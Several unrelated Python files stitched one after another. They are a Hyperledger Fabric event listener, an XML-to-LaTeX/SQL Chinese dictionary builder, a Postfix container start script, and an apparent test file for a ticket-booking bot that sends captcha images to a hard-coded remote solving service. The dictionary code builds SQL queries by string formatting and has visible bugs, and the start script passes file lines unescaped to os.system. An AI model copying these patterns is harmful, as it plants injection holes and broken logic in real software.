(channel_name, asset, event_type),
task_id=key,
queue=worker_queue
)
def on_compute_plan_event(channel_name, block_number, tx_id, tx_status, asset):
worker_queue = f"{settings.ORG_NAME}.worker"
key = asset['compute_plan_key']
# Currently, we received this event on done, failed and canceled status
# We apply the same behavior for those three status.
# In the future, we can apply a conditional strategy based on the status.
status = asset['status']
if tx_status != 'VALID':
logger.error(
f'Failed transaction on cleaning task {key}: type=computePlan'
f' status={status} with tx status: {tx_status}')
return
logger.info(f'Processing cleaning task {key}: type=computePlan status={status}')
task_id = f'{key}_{tx_id}'
if AsyncResult(task_id).state != 'PENDING':
logger.info(f'Skipping cleaning task: already exists. '
f'Info: compute_plan={key}, block_numer={block_number}, tx_id={tx_id}')
return
on_compute_plan.apply_async(
(channel_name, asset, ),
task_id=task_id,
queue=worker_queue
)
def on_event(channel_name, cc_event, block_number, tx_id, tx_status):
payload = json.loads(cc_event['payload'])
for event_type, assets in payload.items():
if not assets:
continue
for asset in assets:
if event_type == 'compute_plan':
on_compute_plan_event(channel_name, block_number, tx_id, tx_status, asset)
else:
on_tuples_event(channel_name, block_number, tx_id, tx_status, event_type, asset)
def wait(channel_name):
def on_channel_event(cc_event, block_number, tx_id, tx_status):
on_event(channel_name, cc_event, block_number, tx_id, tx_status)
with get_event_loop() as loop:
client = Client()
channel = client.new_channel(channel_name)
target_peer = Peer(name=settings.LEDGER_PEER_NAME)
target_peer.init_with_bundle({
'url': f'{settings.LEDGER_PEER_HOST}:{settings.LEDGER_PEER_PORT}',
'grpcOptions': ledger_grpc_options(settings.LEDGER_PEER_HOST),
'tlsCACerts': {'path': settings.LEDGER_PEER_TLS_CA_CERTS},
'clientKey': {'path': settings.LEDGER_PEER_TLS_CLIENT_KEY},
'clientCert': {'path': settings.LEDGER_PEER_TLS_CLIENT_CERT},
})
try:
# can fail
requestor = create_user(
name=f'{settings.LEDGER_USER_NAME}_events',
org=settings.ORG_NAME,
state_store=FileKeyValueStore(settings.LEDGER_CLIENT_STATE_STORE),
msp_id=settings.LEDGER_MSP_ID,
key_path=glob.glob(settings.LEDGER_CLIENT_KEY_PATH)[0],
cert_path=settings.LEDGER_CLIENT_CERT_PATH
)
except BaseException:
pass
else:
# Note:
# We do a loop to connect to the channel event hub because grpc may disconnect and create an exception
# Since we're in a django app of backend, an exception here will not crash the server (if the "ready"
# method has already returned "true").
# It makes it difficult to reconnect automatically because we need to kill the server
# to trigger the connexion.
# So we catch this exception (RPC error) and retry to connect to the event loop.
while True:
# use chaincode event
channel_event_hub = channel.newChannelEventHub(target_peer,
requestor)
try:
# We want to replay blocks from the beginning (start=0) if channel event hub was disconnected during
# events emission
stream = channel_event_hub.connect(start=0,
filtered=False)
channel_event_hub.registerChaincodeEvent(
settings.LEDGER_CHANNELS[channel_name]['chaincode']['name'],
'chaincode-updates',
onEvent=on_channel_event)
logger.info(f'Connect to Channel Event Hub ({channel_name})')
loop.run_until_complete(stream)
except Exception as e:
logger.error(f'Channel Event Hub failed for {channel_name} ({type(e)}): {e} re-connecting in 5s')
time.sleep(5)
class EventsConfig(AppConfig):
name = 'events'
def listen_to_channel(self, channel_name):
# We try to connect a client first, if it fails the backend will not start.
# It prevents potential issues when we launch the channel event hub in a subprocess.
while True:
try:
with get_hfc(channel_name) as (loop, client, user):
logger.info(f'Events: Connected to channel {channel_name}.')
except Exception as e:
logger.exception(e)
time.sleep(5)
logger.error(f'Events: Retry connecting to channel {channel_name}.')
else:
break
p1 = multiprocessing.Process(target=wait, args=[channel_name])
p1.start()
def ready(self):
for channel_name in settings.LEDGER_CHANNELS.keys():
self.listen_to_channel(channel_name)
|
hcl.py
|
# -*- coding: utf-8 -*-
import xml.etree.ElementTree as elemTree
import os, uuid
from operator import methodcaller, itemgetter, mul
from cihai.core import Cihai
c = Cihai()
import hms.tex as tex
import hms.html as html
import multiprocessing as mp
from multiprocessing import Process, Lock, Queue, Value
def generateIdent():
return str(uuid.uuid4())
def textify(e, spell, ident, coder=tex):
total = ''
part = e.text
beforehand = False
for child in e:
if part != None:
part = part.replace('.', '。').replace(',', ',').replace(' ', '').replace('\t', '').replace('\n', '').replace(' ', '')
if part != '':
total += part
beforehand = False
if child.tag == 'quote':
temp = textify(child, spell, ident, coder)
level = 1
if 'level' in child.attrib:
level = int(child.attrib['level'])
if level == 1:
total += '『{}』'.format(temp)
elif level >= 2:
total += '「{}」'.format(temp)
beforehand = False
elif child.tag == 'b':
total +=coder.bold(textify(child, spell, ident, coder))
beforehand = False
elif child.tag == 'self':
total +=coder.bold(spell)
beforehand = False
elif child.tag == 'ref':
ident = child.attrib['ident']
(tr, f) = search(ident)
root = tr.getroot()
num = 1
mspell = ''
if 'num' in root.attrib.keys():
num = int(root.attrib['num'])
for child0 in root:
if child0.tag == 'main-spell':
mspell = child0.text
total += coder.bold(mspell)
beforehand = False
elif child.tag == 'cite':
if beforehand:
if 'page' in child.attrib.keys():
total += "[][{}]{{{}}}".format(child.attrib['page'], child.attrib['src'])
else:
total += "{{{}}}".format(child.attrib['src'])
else:
if 'page' in child.attrib.keys():
total += "\\parencites[][{}]{{{}}}".format(child.attrib['page'], child.attrib['src'])
else:
total += "\\parencites{{{}}}".format(child.attrib['src'])
beforehand = True
part = child.tail
if part != None:
if part != '':
part = part.replace('.', '。').replace(',', ',').replace(' ', '').replace('\t', '').replace('\n', '').replace(' ', '')
total += part
beforehand = True
return total.strip()
def scandef(e, spell, ident, coder=tex):
synonyms = []
antonyms = []
samples = []
explanation = ''
if not('num' in e.attrib.keys()):
num = 1
else:
num = e.attrib['num']
if not('category' in e.attrib.keys()):
category = ''
else:
category = e.attrib['category']
for child in e:
if child.tag == 'exp':
explanation = textify(child, spell, ident, coder)
elif child.tag == 'samp':
if 'src' in child.attrib.keys():
source = child.attrib['src']
else:
source = ''
samples += [(source, textify(child, spell, ident, coder))]
elif child.tag == 'syn':
(temp, f) = search(child.attrib['ident'])
root = temp.getroot()
num0 = 1
mspell = ''
if 'num' in root.attrib.keys():
num0 = root.attrib['num']
for child0 in root:
if child0.tag == 'main-spell':
mspell = child0.text
synonyms += [(mspell, num0, child.attrib['ident'])]
elif child.tag == 'ant':
(temp, f) = search(child.attrib['ident'])
root = temp.getroot()
num0 = 1
mspell = ''
if 'num' in root.attrib.keys():
num0 = root.attrib['num']
for child0 in root:
if child0.tag == 'main-spell':
mspell = child0.text
antonyms += [(mspell, num0, child.attrib['ident'])]
return (num, category, synonyms, antonyms, samples, explanation)
def search(ident):
for (path, dir, files) in os.walk('entries'):
for filename in files:
p = '{}/{}'.format(path, filename)
if os.path.isfile(p):
ext = os.path.splitext(filename)[-1]
if ext == '.xml':
tree = elemTree.parse(p)
root = tree.getroot()
if 'ident' in root.attrib:
if root.attrib['ident'] == ident:
if root.tag == 'entry':
return (tree, p)
return None
def updatexml(path):
print(path)
tree = elemTree.parse(path)
root = tree.getroot()
if not('ident' in root.attrib.keys()):
root.set('ident', '{}'.format(generateIdent()))
tree.write(path)
if not('num' in root.attrib.keys()):
root.set('num', '1')
num = '1'
else:
num = root.attrib['num']
ident = root.attrib['ident']
if root.tag == 'entry':
for child in root:
if child.tag == 'def':
numx = child.attrib['num']
for child0 in child:
if child0.tag == 'syn':
ident0 = child0.attrib['ident']
num0 = child0.attrib['num']
(ref, f) = search(ident0)
for definition in ref.findall('def'):
if 'num' in definition.attrib.keys():
if definition.attrib['num'] == num0:
need = True
for child1 in definition:
if (child1.tag == 'syn') and (child1.attrib['ident'] == ident) and (child1.attrib['num'] == numx):
need = False
if need:
definition.append(elemTree.Element('syn', {'ident': ident, 'num': numx}))
ref.write(f, encoding='utf-8')
elif child0.tag == 'ant':
ident0 = int(child0.attrib['ident'])
num0 = int(child0.attrib['num'])
(ref, f) = search(ident0)
for definition in ref.findall('def'):
if 'num' in definition.attrib.keys():
if definition.attrib['num'] == num0:
need = True
for child1 in definition:
if (child1.tag == 'ant') and (child1.attrib['ident'] == ident) and (child1.attrib['num'] == numx):
need = False
if need:
definition.append(elemTree.Element('ant', {'ident': ident, 'num': numx}))
ref.write(f, encoding='utf-8')
tree.write(path, encoding='utf-8')
def scanxml(tree):
root = tree.getroot()
num = root.attrib['num']
ident = root.attrib['ident']
alternative_spells = []
definitions= []
spell = ''
cites = ''
if root.tag == 'entry':
for child in root:
if child.tag == 'spell':
alternative_spells += [child.text.strip()]
elif child.tag == 'main-spell':
spell = child.text.strip()
elif child.tag == 'def':
definitions += [scandef(child, spell, ident)]
elif child.tag == 'cite':
source = child.attrib['src']
if 'page' in child.attrib.keys():
cites += "\\parencite[][{}]{{{}}}".format(child.attrib['page'], source)
else:
cites += "\\parencite{{{}}}".format(source)
return (root, num, spell, ident, alternative_spells, definitions, cites)
def _spell(x):
global c
total = []
(root, num, spell, ident, alternative_spells, definitions, cites) = x
for ch in spell:
kangxi = c.unihan.lookup_char(ch).first().kRSKangXi.split('.')
total += [int(kangxi[0]), int(kangxi[1])]
return [total, int(num)]
def update():
for (path, dir, files) in os.walk('./'):
for filename in files:
p = '{}/{}'.format(path, filename)
ext = os.path.splitext(filename)[-1]
if ext == '.xml':
updatexml(p)
class entry:
def __init__(self, values):
self.values =values
def index_spell(self):
return _spell(self.values)
def _work(q, p):
try:
result = scanxml(elemTree.parse(p))
q.put(result)
except Exception as e:
print('An error has been occured in {}'.format(p))
def collect_entries(code=tex):
results = []
processes = []
for (path, dir, files) in os.walk('entries'):
for filename in files:
p = '{}/{}'.format(path, filename)
ext = os.path.splitext(filename)[-1]
if ext == '.xml':
q = mp.Queue()
proc = Process(target=_work, args=(q, p))
proc.start()
processes += [(q, proc)]
for x in processes:
(qr, p) = x
p.join()
results += [entry(qr.get())]
results.sort(key=methodcaller('index_spell'))
return results
def build_db(conn):
results = collect_entries(html)
conn.execute("DROP TABLE IF EXISTS _alternative_spells;")
conn.execute("DROP TABLE IF EXISTS _synonyms;")
conn.execute("DROP TABLE IF EXISTS _antonyms;")
conn.execute("DROP TABLE IF EXISTS _samples;")
conn.execute("DROP TABLE IF EXISTS _explanations;")
conn.execute("DROP TABLE IF EXISTS _words;")
conn.execute("CREATE TABLE _words(_spell TEXT, _ident BIGINT);")
conn.execute("CREATE TABLE _alternative_spells(_spell TEXT, _ident BIGINT);")
conn.execute("CREATE TABLE _explanations(_category TEXT, _exp TEXT, _ident BIGINT, _exp_ident BIGSERIAL PRIMARY KEY);")
conn.execute("CREATE TABLE _synonyms(_from BIGINT REFERENCES _explanations(_exp_ident), _dest BIGINT);")
conn.execute("CREATE TABLE _antonyms(_from BIGINT REFERENCES _explanations(_exp_ident), _dest BIGINT);")
conn.execute("CREATE TABLE _samples(_source TEXT, _sample TEXT, _exp BIGINT REFERENCES _explanations(_exp_ident));")
for result in results:
(root, num, spell, ident, alternative_spells, definitions) = result.values
conn.execute('INSERT INTO _words(_spell, _ident) VALUES(\'{}\', {});'.format(spell, ident))
for sp in alternative_spells:
conn.execute("INSERT INTO _alternative_spells(_spell, _ident) VALUES(\'{}\', {});".format(spell, ident))
conn.commit()
definition_txt = ''
for d in sorted(definitions, key=itemgetter(0)):
(numx, category, synonyms, antonyms, samples, explanation) = d
exp_ident = 0
for row in conn.execute("INSERT INTO _explanations(_exp, _category, _ident) VALUES(\'{}\', \'{}\', {}) RETURNING _exp_ident;".format(explanation, category, ident)).fetchall():
exp_ident = row['_ident']
for synonym in synonyms:
conn.execute("INSERT INTO _synonyms(_from, _dest) VALUES ({}, {});".format(exp_ident, synonym[3]))
for antonym in antonyms:
conn.execute("INSERT INTO _synonyms(_from, _dest) VALUES ({}, {});".format(exp_ident, antonym[3]))
for sample in samples:
conn.execute("INSERT INTO _synonyms(_source, _sample, _exp) VALUES ({}, {});".format(sample[0], sample[1], exp_ident))
def build():
results = collect_entries(tex)
txt = ''
for result in results:
(root, num, spell, ident, alternative_spells, definitions, cites) = result.values
spells = ''
for sp in alternative_spells:
spells += '\\also{{{}}}'.format(sp)
definition_txt = ''
for d in sorted(definitions, key=itemgetter(0)):
(numx, category_txt, synonyms, antonyms, samples, explanation) = d
synonym_txt = ''
antonym_txt = ''
sample_txt = ''
for synonym in synonyms:
synonym_txt += "\\syn{{{}}}{{{}}}".format(synonym[0], synonym[1])
for antonym in antonyms:
antonym_txt += "\\ant{{{}}}{{{}}}".format(antonym[0], antonym[1])
for sample in samples:
sample_txt += '{}云『{}』'.format(sample[0], sample[1])
definition_txt += "\\explain{{{}}}{{{}{}{}{}}}".format(category_txt, explanation, synonym_txt, antonym_txt, sample_txt)
txt+= "\\entry{{{}}}{{{}}}{{{}{}{}}}{{{}}}".format(spell, num, spells, definition_txt, cites, '')
return txt
def initialize():
global c
if not c.unihan.is_bootstrapped:
c.unihan.bootstrap()
initialize()
|
start.py
|
#!/usr/bin/python3
import jinja2
import os
import socket
import glob
import shutil
import tenacity
import multiprocessing
from tenacity import retry
from podop import run_server
def start_podop():
os.setuid(100)
run_server(3 if "DEBUG" in os.environ else 0, "postfix", "/tmp/podop.socket", [
("transport", "url", "http://admin/internal/postfix/transport/§"),
("alias", "url", "http://admin/internal/postfix/alias/§"),
("domain", "url", "http://admin/internal/postfix/domain/§"),
("mailbox", "url", "http://admin/internal/postfix/mailbox/§"),
("sender", "url", "http://admin/internal/postfix/sender/§")
])
convert = lambda src, dst: open(dst, "w").write(jinja2.Template(open(src).read()).render(**os.environ))
# Actual startup script
resolve = retry(socket.gethostbyname, stop=tenacity.stop_after_attempt(100), wait=tenacity.wait_random(min=2, max=5))
os.environ["FRONT_ADDRESS"] = resolve(os.environ.get("FRONT_ADDRESS", "front"))
os.environ["HOST_ANTISPAM"] = os.environ.get("HOST_ANTISPAM", "antispam:11332")
os.environ["HOST_LMTP"] = os.environ.get("HOST_LMTP", "imap:2525")
for postfix_file in glob.glob("/conf/*.cf"):
convert(postfix_file, os.path.join("/etc/postfix", os.path.basename(postfix_file)))
if os.path.exists("/overrides/postfix.cf"):
for line in open("/overrides/postfix.cf").read().strip().split("\n"):
os.system('postconf -e "{}"'.format(line))
if os.path.exists("/overrides/postfix.master"):
for line in open("/overrides/postfix.master").read().strip().split("\n"):
os.system('postconf -Me "{}"'.format(line))
for map_file in glob.glob("/overrides/*.map"):
destination = os.path.join("/etc/postfix", os.path.basename(map_file))
shutil.copyfile(map_file, destination)
os.system("postmap {}".format(destination))
os.remove(destination)
convert("/conf/rsyslog.conf", "/etc/rsyslog.conf")
# Run Podop and Postfix
multiprocessing.Process(target=start_podop).start()
if os.path.exists("/var/run/rsyslogd.pid"):
os.remove("/var/run/rsyslogd.pid")
os.system("/usr/lib/postfix/post-install meta_directory=/etc/postfix create-missing")
os.system("/usr/lib/postfix/master &")
os.execv("/usr/sbin/rsyslogd", ["rsyslogd", "-n"])
|
TestAll.py
|
# coding=utf-8
import base64
import threading
import unittest
from collections import OrderedDict
import requests
from agency.agency_tools import proxy
from agency.cdn_utils import CDNProxy
from config.emailConf import sendEmail
from config.serverchanConf import sendServerChan
from init.select_ticket_info import select
def _set_header_default():
header_dict = OrderedDict()
header_dict["Accept"] = "*/*"
header_dict["Accept-Encoding"] = "gzip, deflate"
header_dict["X-Requested-With"] = "superagent"
header_dict[
"User-Agent"] = "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
header_dict["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"
class testAll(unittest.TestCase):
def testProxy(self):
"""
测试代理是否可用
:return:
"""
_proxy = proxy()
proxie = _proxy.setProxy()
url = "http://httpbin.org/ip"
rsp = requests.get(url, proxies=proxie, timeout=5, headers=_set_header_default()).content
print(u"当前代理ip地址为: {}".format(rsp))
def testEmail(self):
"""
实测邮箱是否可用
:return:
"""
sendEmail(u"订票小助手测试一下")
# def testConfig(self):
# """
# 测试config是否配置正确
# :return:
# """
def testServerChan(self):
"""
实测server酱是否可用
:return:
"""
sendServerChan(u"server酱 微信通知测试一下")
def testUserAgent(self):
"""
测试UserAgent
:return:
"""
from fake_useragent import UserAgent
for i in range(10000):
ua = UserAgent(verify_ssl=False)
print(ua.random)
def testVerfyImage(self):
"""
测试模型加载识别
:return:
"""
from verify.localVerifyCode import Verify
v = Verify()
with open('../tkcode.png', 'rb') as f:
base64Image = base64.b64encode(f.read())
for i in range(5):
t = threading.Thread(target=v.verify, args=(base64Image,))
t.start()
def testRemoteVerfy(self):
"""
测试打码是否可用
:return:
"""
import requests
import time
while True:
try:
starttime = time.time()
rsp = requests.post(url="http://120.77.154.140:8000/verify/base64/",
data={
'imageFile': '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